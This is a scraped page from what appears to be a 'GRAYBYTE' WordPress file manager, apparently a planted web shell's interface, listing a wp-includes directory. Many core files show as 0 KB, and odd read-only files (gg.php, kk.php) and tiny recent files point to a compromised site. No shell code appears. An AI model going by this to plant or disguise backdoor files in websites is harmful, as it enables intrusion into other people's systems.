10 Feb 2022 1.56 PM
albatroz / albatroz
0644
functions.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
functions.wp-scripts.php
13.121 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
functions.wp-styles.php
8.37 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
general-template.php
155.356 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
gg.php
3.746 KB
11 Jun 2026 3.11 AM
albatroz / albatroz
0444
global-styles-and-settings.php
4.685 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
http.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
https-detection.php
6.701 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
https-migration.php
4.619 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
kk.php
3.708 KB
11 Jun 2026 4.22 AM
albatroz / albatroz
0444
kses.php
67.345 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
l10n.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
link-template.php
145.705 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
load-check.php
0.012 KB
27 Jan 2025 3.29 AM
albatroz / albatroz
0644
load.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
locale.php
0.158 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
media-template.php
58.967 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
media.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
meta.php
61.213 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-blogs.php
24.584 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-default-constants.php
4.652 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-default-filters.php
6.35 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-deprecated.php
20.634 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-files.php
2.592 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-functions.php
91.922 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-load.php
19.322 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-network.php
3.575 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-settings.php
4.027 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
ms-site.php
38.679 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
nav-bar.php
0.012 KB
27 Jan 2025 3.29 AM
albatroz / albatroz
0644
nav-menu-template.php
22.75 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
nav-menu.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
option.php
74.99 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
pluggable-deprecated.php
6.116 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
pluggable.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
plugin.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
plugins-init.php
0.012 KB
27 Jan 2025 3.29 AM
albatroz / albatroz
0644
post-formats.php
6.913 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
post-template.php
63.328 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
post-thumbnail-template.php
10.633 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
post.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
query.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
registration-functions.php
0.195 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
registration.php
0.195 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
rest-api.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
revision.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
rewrite.php
18.763 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
robots-template.php
5.052 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
rss-functions.php
0.249 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
rss.php
22.439 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
script-loader.php
108.668 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
session.php
0.252 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
shortcodes.php
20.93 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
sitemaps.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
spl-autoload-compat.php
0.431 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
taxonomy.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
template-canvas.php
0.578 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
template-loader.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
template.php
21.958 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
theme-i18n.json
0.903 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
theme-templates.php
5.404 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
theme.json
5.602 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
theme.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
update.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
user.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
vars.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
version.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
widgets.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
wlwmanifest.xml
1.021 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
wp-db.php
106.221 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
wp-diff.php
0.632 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF